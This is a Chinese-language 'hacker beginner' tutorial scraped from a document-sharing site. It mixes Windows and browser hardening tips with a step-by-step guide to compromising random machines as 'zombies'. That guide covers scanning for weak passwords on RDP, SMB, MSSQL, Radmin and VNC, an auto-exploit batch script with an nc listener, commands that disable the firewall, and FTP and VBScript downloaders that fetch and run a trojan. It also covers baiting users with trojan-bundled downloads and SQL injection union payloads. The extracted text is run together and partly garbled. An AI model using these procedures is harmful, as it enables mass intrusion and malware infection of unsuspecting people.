从零开始知识学习黑客技术入门基础教育材料(学习基础).doc

《从零开始知识学习黑客技术入门基础教育材料(学习基础).doc》由会员分享，可在线阅读，更多相关《从零开始知识学习黑客技术入门基础教育材料(学习基础).doc（41页珍藏版）》请在得力文库 - 分享文档赚钱的网站上搜索。

1、*.最简单的黑客入门教程目 录1黑客简介22保护自己电脑绝对不做黑客肉鸡23抓肉鸡的几种方法54防止黑客通过Explorer侵入系统95SQL注入详解105.1注入工具115.2php+Mysql注入的误区115.3简单的例子125.4语句构造145.5高级应用225.6实例265.7注入的防范295.8我看暴库漏洞原理及规律1295.9我看暴库漏洞原理及规律2326跨站脚本攻击346.1跨站脚本工具346.2什么是XSS攻击356.3如何寻找XSS漏洞356.4寻找跨站漏洞366.5如何利用366.6XSS与其它技术的结合387XPath注入387.1XPath注入介绍387.2XPath注

2、入工具41声明：文章来源大多是网上收集而来，版权归其原作者所有。1 黑客简介黑客(hacker)这个词通常被用来指那些恶意的安全破坏者。关于黑客一词的经典定义，最初来源于麻省理工学院关于信息技术的一份文档，之后便被新闻工作者们长期使用。但是这个在麻省理工被当做中性词汇的术语，却逐渐被新闻工作者们用在了贬义的环境，而很多人也受其影响，最终导致了黑客一词总是用于贬义环境。有些人认为，我们应该接受黑客一词已经被用滥并且有了新的意义。他们认为，如果不认可这种被滥用的词汇，那么将无法与那些不懂技术的人进行有效的交流。而我仍然认为，将黑客和恶意的骇客(cracker)分开表述，对交流会更有效，比如使用恶意

3、的安全骇客会更容易让对方理解我所指的对象，从而能够达到更好的沟通交流效果，也避免了对黑客一词的滥用。之所以要区分黑客和恶意骇客，是因为在某些情况下，我们讨论的对象是那些毫无恶意并且不会对安全防御或者用户隐私造成损害的对象，这些人只有用黑客这个词来描述才最贴切。如果你只是简单的将黑客和恶意的安全骇客划等号，将无法在与人交流安全技术问题时，轻松的分辨别人所指的到底是哪种类型的人。黑客和骇客的区别是，黑客仅仅对技术感兴趣，而后者则是通过技术获取职业发展或者谋生。很多黑客和骇客都具有技术天赋，有些骇客据此进行职业发展。当然，并不是每个有技术天赋的人都必须沿着黑客或者骇客的方向发展。黑客这个术语的经典意

4、义是指那些对于事物如何工作非常感兴趣的人，他们修理，制作或者修改事物，并以此为乐。对于某些人来说，这个词并不准确，而对于另一些人来说，黑客意味着最终能完全掌握某些事情。根据RFC1392的记载，互联网用户词汇将黑客定义为：迷恋于获取某些系统尤其是计算机和计算机网络系统内部运作机制的人。而这个词经常被错误的用于贬义环境。在贬义环境中，正确的用词应该是骇客。TheJargonWiki对于黑客的首次定义为：迷恋于探知可编程系统细节以及如何扩展其功能的人，与大多数只需了解系统基本知识的人不同。而安全骇客，则是以破坏安全系统为目的的人。有些安全骇客最终会用自己所掌握的技术做善事，提供渗透测试服务，或者其

5、他有利于安全防护的工作。而更多的人则是利用自己的技术行恶事。在RFC1392和JargonWiki中都对骇客进行了类似的贬义定义。在不同的环境中使用正确的术语，对于沟通来说是非常重要的。在这方面我是有过切身体验的。一次与一家企业的负责人交流时，我们使用了相同的词汇，但是所指的对象却正好相反，结果沟通效果非常失败。当两种不同的背景下需要同一个词汇时，比如需要谈到传统意义的黑客以及带有恶意目的的骇客时，如果不事先将术语解释清楚，或给出一定的规范，肯定会导致交流困难。对于目前的交流来说，一个更简单的办法就是只适用恶意安全骇客，而不是黑客，这是因为：目前大部分消息中所指的，都是带有恶意目的的骇客，而不

6、是以技术为目标的黑客。这就是为什么在我的文章中，总是会使用恶意的安全骇客来代指从事恶意活动的人，而在某些文章中如果需要涉及到传统意义的黑客，我也会在文中再次进行说明。在讨论安全话题时，为了能更清晰的交流，我也建议大家和我一样采用正确的词汇。2 保护自己电脑绝对不做黑客肉鸡第一招：屏幕保护在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，系统就会自动启动屏幕保护程序，而当用户移动鼠标或敲击键盘想返回正常工作状态时，系统就会打开一个密码确认框，只有输入正确的密码之后才能返回系统，不知道密码的用户将无法进入工作状态，从而保护了数据的安全。提示：部分设计

7、不完善的屏幕保护程序没有屏蔽系统的Ctrl+Alt+Del的组合键，因此需要设置完成之后测试一下程序是否存在这个重大Bug.不过，屏幕保护最快只能在用户离开1分钟之后自动启动，难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗?其实我们只要打开Windows安装目录里面的system子目录，然后找到相应的屏幕保护程序(扩展名是SCR)，按住鼠标右键将它们拖曳到桌面上，选择弹出菜单中的在当前位置创建快捷方式命令，在桌面上为这些屏幕保护程序建立一个快捷方式。此后，我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。第二招：巧妙隐藏硬盘在按Web页查看方式下，进入Windows目

8、录时都会弹出一句警告信息，告诉你这是系统文件夹如果修改该文件夹的内容可能导致程序运行不正常，要查看该文件夹的内容，请单击显示文件，这时单击显示文件就可以进入该目录了。原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件，之前必须在文件夹选项中单击查看标签，选择显示所有文件，这样就可以看见这两个文件了)。再按F5键刷新一下，看看发生了什么，是不是和进入Windows目录时一样。接下来我们用记事本打开folder.htt，这是用HTML语言编写的一个文件，发挥你的想像力尽情地修改吧。如果你不懂HT

9、ML语言也没关系，先找到显示文件将其删除，找到修改该文件夹的内可能导致程序运行不正常，要查看该文件夹的内容，请单击显示文件，将其改为自己喜欢的文字，例如安全重地，闲杂人等请速离开。将要查看该文件夹的内容，请单击改为否则，后果自负!，接着向下拖动滑块到倒数第9行，找到(file:/%TEMPLATEDIR%wvlogo.gif)这是显示警告信息时窗口右下角齿轮图片的路径，将其改为自己图片的路径，例如用d：tupiantupian1.jpg替换/后面的内容，记住这里必须将图片的后缀名打出，否则将显示不出图片。当然，你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果，

10、然后只要将原文件拷贝到下面这段文字的后面，覆盖掉原文件中之间的内容就可以了。*ThisfilewasautomaticallygeneratedbyMicrosoftInternetEXPlorer5.0*usingthefile%THISDIRPATH%folder.htt.保存并退出，按F5键刷新一下，是不是很有个性?接下来要作的就是用超级兔子将你所要的驱动器隐藏起来，不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的，就是干脆将folder.htt原文件中之间的内容全部删除，这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象，使其中的文件更安全。第三招：禁用开始菜单命令在

11、Windows2000/XP中都集成了组策略的功能，通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。运行开始运行命令，在运行对话框的打开栏中输入gpedit.msc，然后单击确定按钮即可启动WindowsXP组策略编辑器。在本地计算机策略中，逐级展开用户配置管理模板任务栏和开始菜单分支，在右侧窗口中提供了任务栏和开始菜单的有关策略。在禁用开始菜单命令的时候，在右侧窗口中，提供了删除开始菜单中的公用程序组、我的文档图标、文档菜单、网上邻居图标等策略。清理开始菜单的时候只要将不需要的菜单项所对应的策略启用即可，比如以删除我的文档图标为例，具体操作步骤为：1)在策略列表窗口中

12、用鼠标双击从开始菜单中删除我的文档图标选项。2)在弹出窗口的设置标签中，选择已启用单选按钮，然后单击确定即可。第四招：桌面相关选项的禁用WindowsXP的桌面就像你的办公桌一样，有时需要进行整理和清洁。有了组策略编辑器之后，这项工作将变得易如反掌，只要在本地计算机策略中展开用户配置管理模板桌面分支，即可在右侧窗口中显示相应的策略选项。1)隐藏桌面的系统图标倘若隐藏桌面上的系统图标，传统的方法是通过采用修改注册表的方式来实现，这势必造成一定的风险性，采用组策略编辑器，即可方便快捷地达到此目的。若要隐藏桌面上的网上邻居和InternetEXPlorer图标，只要在右侧窗口中将隐藏桌面上网上邻居图

13、标和隐藏桌面上的InternetEXPlorer图标两个策略选项启用即可。如果隐藏桌面上的所有图标，只要将隐藏和禁用桌面上的所有项目启用即可。当启用了删除桌面上的我的文档图标和删除桌面上的我的电脑图标两个选项以后，我的电脑和我的文档图标将从你的电脑桌面上消失了。如果在桌面上你不再喜欢回收站这个图标，那么也可以把它给删除，具体方法是将从桌面删除回收站策略项启用。2)禁止对桌面的某些更改如果你不希望别人随意改变计算机桌面的设置，请在右侧窗口中将退出时不保存设置这个策略选项启用。当你启用这个了设置以后，其他用户可以对桌面做某些更改，但有些更改，诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后

14、都无法保存。第五招：禁止访问控制面板如果你不希望其他用户访问计算机的控制面板，你只要运行组策略编辑器，并在左侧窗口中展开本地计算机策略用户配置管理模板控制面板分支，然后将右侧窗口的禁止访问控制面板策略启用即可。此项设置可以防止控制面板程序文件的启动，其结果是他人将无法启动控制面板或运行任何控制面板项目。另外，这个设置将从开始菜单中删除控制面板，同时这个设置还从Windows资源管理器中删除控制面板文件夹。提示：如果你想从上下文菜单的属性项目中选择一个控制面板项目，会出现一个消息，说明该设置防止这个操作。第六招：设置用户权限当多人共用一台计算机时，在WindowsXP中设置用户权限，可以按照以下

15、步骤进行：1)运行组策略编辑器程序。2)在编辑器窗口的左侧窗口中逐级展开计算机配置Windows设置安全设置本地策略用户权限指派分支。3)双击需要改变的用户权限，单击添加用户或组按钮，然后双击想指派给权限的用户账号，最后单击确定按钮退出。第七招：文件夹设置审核WindowsXP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件，而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的安全。为文件和文件夹设置审核的步骤如下：1)在组策略窗口中，逐级展开右侧窗口中的计算机配置Windows设置安全设置本地策略分支，然后在该分支下选择审核策略选项。2)在右侧

16、窗口中用鼠标双击审核对象访问选项。3)用鼠标右键单击想要审核的文件或文件夹，选择弹出菜单的属性命令，接着在弹出的窗口中选择安全标签。4)单击高级按钮，然后选择审核标签。5)根据具体情况选择你的操作：倘若对一个新组或用户设置审核，可以单击添加按钮，并且在名称框中键入新用户名，然后单击确定按钮打开审核项目对话框。要查看或更改原有的组或用户审核，可以选择用户名，然后单击查看/编辑按钮。要删除原有的组或用户审核，可以选择用户名，然后单击删除按钮即可。6)如有必要的话，在审核项目对话框中的应用到列表中选取你希望审核的地方。7)如果想禁止目录树中的文件和子文件夹继承这些审核项目，选择仅对此容器内的对象和/

17、或容器应用这些审核项复选框。注意：必须是管理员组成员或在组策略中被授权有管理审核和安全日志权限的用户可以审核文件或文件夹。在WindowsXP审核文件、文件夹之前，你必须启用组策略中审核策略的审核对象访问。否则，当你设置完文件、文件夹审核时会返回一个错误消息，并且文件、文件夹都没有被审核。3 抓肉鸡的几种方法找点工具就OK了端口抓肉鸡的几种方法 肉鸡大家都应该清楚是什么东西吧！呵呵 这点就不用说了.慢慢学1、3389抓鸡现在国内网络上流传着一种克隆版的XP，安装后会默认开启一个账号为new,密码为空的账户，而且基本上都是开着3389的，我们就可以利用这一点来抓肉鸡。首先用端口扫描工具扫一段IP

18、的3389端口，扫完后就直接用远程桌面连接开放3389的机器（也可以把结果保存为文本文件，用批量生成3389连接的工具来连接），然后输入账号new登入，如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉这种方法只针XP系统，如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显，如果别人不是用new账号登入XP的，你再登入上去就会把他挤出去（XP只支持单用户登入，用户登入需要用工具开），或者电脑前有人你就不可能去打开IE下载木马了。2、扫135端口抓肉鸡首先先用端口扫描器扫一段IP的135端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用recton开teln

19、et传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的135肉鸡，要抓外地的只能用外地的135肉鸡来扫。（详细动画可以去黑客网站搜索135）3、扫445端口抓肉鸡和扫135抓肉鸡差不多，首先先用端口扫描器扫一段IP的445端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的445肉鸡，要抓外地的只能用外地的445肉鸡来扫。（详细动画可以去黑客网站搜索445）4、1433端口批量溢出抓肉鸡这个方法可以实现全自动抓鸡，不过现在太多人搞，成功率已经不高了。要用到的工具：S扫sqlhello.exen

20、c.exe批处理文件首先先写个批处理，打开记事本，把以下代码复制修改后，储存为扫描+溢出.bat文件echoofffor/feol=;tokens=1,2delims=%iin(tt.txt)dos.exetcp%i%j14331000/saveechoofffor/feol=;tokens=1delims=%iin(Result.txt)dosqlhello%i1433xxx.xxx.xx.xx556还要新建一个tt.txt，里面你要扫的IP段，格式为XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX,中间是空格1433是要扫描的端口，1000是扫描线程数，dosqlhello%i

21、1433xxx.xxx.xx.xx556这个里的XXX添你的IP，556是后面NC监听的端口然后再写个批处理echooffNc-l-vv-p556daima.txtechousernamedaima.txtechopassworddaima.txtechobindaima.txt(以2进制传输数据)echogetxxx.exe(你的木马的文件名,要放在根目录下)daima.txtechobyedaima.txtnetstopsharedaccess(关闭WINDOWS自带防火墙)ftp-s:daima.txtxxx.exe(也是填你木马的文件名)deldaima.txt注意上面的代码回车符别删

22、掉，要不然就没法下你的马了。几种肉鸡上传文件的方法tftp法先在自己某机器上建个tftp服务器,如执行tftpd32.exe，再将文件（sample.exe)上传到别的机器中(肉鸡），肉鸡cmd中执行：tftp-i服务器ipgetsample.exeftp法肉鸡cmd中执行：echoopenftp服务器ip端口ftp.txtechousernameftp.txtechopasswordftp.txtechogetsample.exeftp.txtechobyeftp.txtftp-s:ftp.txtdelftp.txt工具法利用wineggdrop的wget.exe肉鸡cmd中执行：wget网

23、站/sample.exe利用dl.vbe法肉鸡cmd中执行：echowithwscript:if.arguments.countdl.vbeechosetaso=.createobject(adodb.stream):setweb=createobject(microsoft.xmlhttp)dl.vbeechoweb.openget,.arguments(0),0:web.send:ifweb.status200thenquitdl.vbeechoaso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile.arguments(1)

24、,2:endwithdl.vbecscriptdl.vbehttp:/*。*。*。*:88/sample.exesample.exe利用iget.vbe法方法同4，肉鸡cmd中执行：echoiLocal=LCase(WScript.Arguments(1)iget.vbeechoiRemote=LCase(WScript.Arguments(0)iget.vbeechoSetxPost=CreateObject(Microsoft.XMLHTTP)iget.vbeechoxPost.OpenGET,iRemote,0iget.vbeechoxPost.Send()iget.vbeechoSet

25、sGet=CreateObject(ADODB.Stream)iget.vbeechosGet.Mode=3iget.vbeechosGet.Type=1iget.vbeechosGet.Open()iget.vbeechosGet.Write(xPost.responseBody)iget.vbeechosGet.SaveToFileiLocal,2iget.vbecscriptiget.vbehttp:/*。*。*。*/sample.exesample.exe利用Http网站vbe法echoSetxPost=CreateObject(Microsoft.XMLHTTP)dsa.vbeech

26、oxPost.OpenGET,http:/*.*.*.*/sample.exe,0dsa.vbeechoxPost.Send()dsa.vbeechoSetsGet=CreateObject(ADODB.Stream)dsa.vbeechosGet.Mode=3dsa.vbeechosGet.Type=1dsa.vbeechosGet.Open()dsa.vbeechosGet.Write(xPost.responseBody)dsa.vbeechosGet.SaveToFilesample.exe,2dsa.vbecscriptdsa.vbedeldsa.vbe3389法可以开3389，然后

27、登陆，进行本地的下载。该方法对服务器上传很严格的机器特有效。（包括硬件防火墙）先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描，扫描完后自动溢出，溢出后还自动下马执行，爽吧！所以这里讲详细点，呵呵。还有4221端口也可以这样溢出，只要用这些端口的溢出工具就好了，详细动画可以去黑客网站搜索1433。忘了说，上面的工具和批处理什么的都要放在同一个文件夹下。先休息一下，打这么多字累死了继续5、扫1433抓肉鸡之方法2要用到的工具：端口扫描器X-scanSQL综合利用工具上面我们说过了，1433溢出现在成功率已经不高了，所以我们可以用另一种方法。开了1433端口的

28、机器一般都装了SQL，所以我们可以猜测SQL弱口令来抓1433肉鸡。首先先用端口扫描器扫一段IP的1433端口，然后结果保存为文本文件，接着用X-scan导入这些开了1433的IP，然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了，其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏，只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告，列出了有弱口令的机器，然后打开SQL综合利用工具，输入你扫到的弱口令来连接，接着打开SQL综合利用工具-利用目录，上传你的木马，然后在用DOS命令执行你的木马就OK了。6、用WINNTAutoAttack扫SA弱口令抓

29、肉鸡其实这个原理和上面一样，效率也没上面的高，只是想让大家知道下，呵呵。工具：WINNTAutoAttackSQL综合利用工具打开WINNTAutoAttack，找一段IP添上，然后只勾上设置下的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA账号，接着开始扫描，扫完后，用SQL综合利用工具连上传马执行就好了。7、扫4899空口令抓肉鸡工具：端口扫描器4899探测器Radmin首先先用端口扫描器扫一段IP的4899端口，然后用4899探测器导入开了4899端口的IP，接着扫空令，最后用Radmin连接有空口令的机器，带开文件管理，上传的你木马运行就OK了。详细动画可以去黑客网站搜索

30、48998、扫5900端口抓VNC肉鸡工具：VNC扫描器VNC连接器首先用VNC扫描器扫描一段IP，扫描格式为vscan.exe（扫描器文件名）-i219.0.0.0-219.255.255.255（扫描IP段）-p5900-vnc-vv扫描完成后会在扫描器所在的同一文件夹生成一个文本文件，打开后有一列IP，IP后面的有一些单词比如patched,banned,vulnerable,只有单词为vulnerable才能连接。接着就用VNC连接器连接，下面就不用多说了吧？详细动画可以去黑客网站搜索VNC接下来说说挂马抓肉鸡吧。方法有很多，比如BT挂马、免费空间挂马、迅雷挂马等等，有些我也还不会，呵

31、呵。下面就介绍几种我会的。1、BT挂马顾名思义，就是把你的木马发布到BT网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好，而且现在一般的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起，再压缩成RAR文件发布，谁在开始下载时会知道RAR里有木马呢？当他费了好大劲下载完，打开发现是EXE的格式后，总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧？尤其是下XXX片的时候当然你也可以做个网页木马，然后把你网页木马的地址插入到你发布的文件中（不是所有文件都可以这样的，我只知道RM和EXE文件可以插入），别人下载打开后同时也会

32、带开你的网页木马，如果他的系统没有补供你网页木马所利用的漏洞的话，那他就会中你的马了。有些朋友可能会想，我把木马和其他文件捆绑后格式保持为那个文件（比如RM捆绑木马后保持RM格式），那样别人不就不会怀疑了吗？呵呵，如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布，那样你肉鸡不抓疯了才怪所以在这里说一下，木马和其他文件捆绑后生成的文件只能为EXE格式的，除非你有你所捆绑文件的格式的溢出漏洞，那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在很少，大多都被补了，就算有别人也不一定会公开，为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞，针对winrar3

33、.6版本以下的所有版本，只要你winrar版本低于3.6，运行绑了牧马的RAR文件后就会中马。此类木马症状为：运行RAR文件后会弹出一个什么什么损坏还是错误的对话框，然后RAR文件体积变小，减少的体积就为木马的体积。然后再次打开这个RAR文件一切正常，不会弹出错误对话框。在这里提醒下各位赶快更新下WINRAR版本，小心中马哈。2、免费空间挂马其实和BT差不多，就是把做好的木马上传到你申请的免费空间，然后到论坛发些诱惑性的帖子让别人下载你的木马。优点是不用像BT那样做种子，那样不仅要开着电脑，还影响网速。我这几天就是这样挂的，弄个免费空间，上传个木马，到2个XXX论坛发个帖子，每天睡前一顶。

34、上面有好多可以学的，不清楚的问下我4 防止黑客通过Explorer侵入系统给点票票撒.好不容易研究出来的哦 绝对实用.恶意黑客和病毒编译者能利用你邮件和网页浏览软件中的不安全设置来侵入你的电脑。他们可以通过给你发电子邮件或者诱惑你浏览含有恶意代码的网页来达到他们的目的。通过提高你的微软IE浏览器，Outltlook和OutlookExpress的安全设置，可以来帮助你减小被攻击的可能。恶意黑客和病毒编译者能利用你邮件和网页浏览软件中的不安全设置来侵入你的电脑。他们可以通过给你发电子邮件或者诱惑你浏览含有恶意代码的网页来达到他们的目的。通过提高你的微软IE浏览器，Outltlook和Outloo

35、kExpress的安全设置，可以来帮助你减小被攻击的可能。步骤一：设置你浏览器安全级别为高在你使用IE浏览器来浏览网页的时候来提升安全等级：1.在IE的工具菜单中点击Internet选项。2.在InternetOptions的对话框中，点击安全标签，并选择Internet图标。3.在该区域的安全级别选项中，滑动滑条至最高点。这样设置你浏览的所有网站的安全级别为最高。(如果没有滑动条，点击默认级别然后再滑动滑条至最高点。)注意：高的设置可能导致一些网站不可以正常浏览。如果你在改变这个设置后难以正常浏览网页，你可以将你要浏览的网页加到受信任站点列表当中。这将允许网页可以在高安全设置的情况下正常浏览

36、。步骤二：加安全网站到受信任站点列表设置IE安全级别到高可能导致一些网站步可以正常访问，这其中包括了MicrosoftWindows?Update。如果你在改变了设置后不能正常访问网站，你可以把他们加到受信任站点的列表当中，这将令网站可正常工作。微软建议先将Windowsupdatehttp:/)加入受信任站点列表，从而你能直接安装总要的系统升级。加安全网站到受信任站点列表：1.在IE工具菜单，点击Internet选项。2.在Internet选项的对话框中，点击安全标签。3.点击受信任站点的图标，并点击网站按钮。4.在受信任站点对话框中，输入网站的URL在将该网站添加到区域中的对话框里，并且点

37、击添加。受信任站点的特点是只能用以Http：开头的URL。取消对该区域中的所有站点要求服务器验证的选项。5.点击确定。6.在该区域的安全级别中，移动滑条至中级。这样就设定所有你信赖的站点的安全级别为中级。(如果没有滑动条，点击默认级别然后再滑动滑条至最高点。)步骤三：以明文阅读电子邮件信息为了帮助提高你的电子邮件的安全性，设置Outlook或者OutlookExpress为明文阅读所有信息。在OutlookExpress设置明文阅读信息：1.在OutlookExpress工具菜单中，点击选项。2.在选项对话框中，点击阅读标签。3.选择明文阅读所有信息。4.点击确定。在Outlook设置明文阅读

38、信息：1.在OutlookExpress工具菜单中，点击选项。2.在选项对话框中首选参数的标签下，点击电子邮件选项按钮。3.在E-mail选项对话框中，选择阅读以文本格式阅读所有标准邮件。4.点击确定来关闭E-mail选项对话框，再点击确定关闭选项对话框。步骤四：在你的浏览器中阻止弹出窗口为了保护你的电脑不受恶意弹出窗口的影响，而采取一定的措施来阻止他们打开。一些网站使用小的浏览窗口来显示广告，有时会是一些烦人的内容。恶意的攻击者也可能利用弹出窗口伪装成广告或者建议来在你的电脑上安装恶意代码。有效的办法是你在你的浏览器中安装一个防止弹出窗口的工具。大部分类似的软件与IE都是兼容的，其中就包括免

39、费的MSN工具栏。5 SQL注入详解2003年开始，喜欢脚本攻击的人越来越多，而且研究ASP下注入的朋友也逐渐多了起来，我看过最早的关于SQL注入的文章是一篇99年国外的高手写的，而现在国外的已经炉火纯青了，国内才开始注意这个技术，由此看来，国内的这方面的技术相对于国外还是有一段很大差距，话说回来，大家对SQL注入攻击也相当熟悉了，国内各大站点都有些堪称经典的作品，不过作为一篇完整的文章，我觉得还是有必要再说说其定义和原理。如果哪位高手已经达到炉火纯青的地步，不妨给本文挑点刺。权当指点小弟。国内能看到php+Mysql注入的文章可能比较少，但是如果关注各种WEB程序的漏洞，就可以发现，其实这些

40、漏洞的文章其实就是一个例子。不过由于国内研究PHP的人比研究ASP的人实在少太多，所以，可能没有注意，况且PHP的安全性比ASP高很多，导致很多人不想跨越这个门槛。尽管如此，在PHP站点日益增多的今天，SQL注入仍是最有效最麻烦的一种攻击方式，有效是因为至少70%以上的站点存在SQLInjection漏洞，包括国内大部分安全站点，麻烦是因为MYSQL4以下的版本是不支持子语句的，而且当php.ini里的magic_quotes_gpc为On时。提交的变量中所有的(单引号),(双引号),(反斜线)and空字符会自动转为含有反斜线的转义字符。给注入带来不少的阻碍。5.1 注入工具关于SQL注入，目

41、前已经有工具软件支持，如WebCruiser - Web Vulnerability Scanner （Web安全漏洞扫描工具，可以扫描出网站存在SQL注入、跨站脚本攻击、XPath注入的页面，并且可以进一步进行SQL注入验证、跨站攻击验证、XPath注入验证，官方网站为 http:/ ）：如果您想深入学习手工注入，请继续往下看： 早期的时候，根据程序的代码，要构造出没有引号的语句形成有效的攻击，还真的有点困难，好在现在的技术已经构造出不带引号的语句应用在某些场合。只要有经验，其实构造有效的语句一点也不难，甚至成功率也很高，但具体情况具体分析。首先要走出一个误区。注：在没有具体说明的情况下，我

42、们假设magic_quotes_gpc均为off。5.2 php+Mysql注入的误区很多人认为在PHP+MYSQL下注入一定要用到单引号，或者是没有办法像MSSQL那样可以使用declareasysnameselecta=execmaster.dbo.xp_cmdshella这类的命令来消除引号，其实这个是大家对注入的一种误解或这说是对注入认识上的一种误区。为什么呢？因为不管在什么语言里，在引号（包括单双）里，所有字符串均是常量，即使是dir这样的命令，也紧紧是字符串而已，并不能当做命令执行，除非是这样写的代码：$command=dirc:;system($command);否则仅仅只是字符

43、串，当然，我们所说的命令不单指系统命令，我们这里说的是SQL语句，要让我们构造的SQL语句正常执行，就不能让我们的语句变成字符串，那么什么情况下会用单引号？什么时候不用呢？看看下面两句SQL语句：SELECT*FROMarticleWHEREarticleid=$idSELECT*FROMarticleWHEREarticleid=$id两种写法在各种程序中都很普遍，但安全性是不同的，第一句由于把变量$id放在一对单引号中，这样使得我们所提交的变量都变成了字符串，即使包含了正确的SQL语句，也不会正常执行，而第二句不同，由于没有把变量放进单引号中，那我们所提交的一切，只要包含空格，那空格后的变

44、量都会作为SQL语句执行，我们针对两个句子分别提交两个成功注入的畸形语句，来看看不同之处。指定变量$id为：1and1=2unionselect*fromuserwhereuserid=1/*此时整个SQL语句变为：SELECT*FROMarticleWHEREarticleid=1and1=2unionselect*fromuserwhereuserid=1/*指定变量$id为：1and1=2unionselect*fromuserwhereuserid=1此时整个SQL语句变为：SELECT * FROM article WHERE articleid=1 and 1=2 union se

45、lect * from user where userid=1看出来了吗？由于第一句有单引号，我们必须先闭合前面的单引号，这样才能使后面的语句作为SQL执行，并要注释掉后面原SQL语句中的后面的单引号，这样才可以成功注入，如果php.ini中magic_quotes_gpc设置为on或者变量前使用了addslashes()函数，我们的攻击就会化为乌有，但第二句没有用引号包含变量，那我们也不用考虑去闭合、注释，直接提交就OK了。大家看到一些文章给出的语句中没有包含单引号例如pinkeyes的php注入实例中给出的那句SQL语句，是没有包含引号的，大家不要认为真的可以不用引号注入，仔细看看PHPB

46、B的代码，就可以发现，那个$forum_id所在的SQL语句是这样写的：$sql=SELECT*FROM.FORUMS_TABLE.WHEREforum_id=$forum_id;由于没有用单引号包含变量，才给pinkeyes这个家伙有机可乘，所以大家在写PHP程序的时候，记得用单引号把变量包含起来。当然，必要的安全措施是必不可少的。5.3 简单的例子先举一个例子来给大家了解一下PHP下的注入的特殊性和原理。当然，这个例子也可以告诉大家如何学习构造有效的SQL语句。我们拿一个用户验证的例子，首先建立一个数据库和一个数据表并插入一条记录，如下：CREATETABLEuser(useridint(11)NOTNULLauto_increment,usernamevarchar(20)NOTNULLdefault,passwordvarchar(20)NOTNULLdefault,PRIMARYKEY(userid)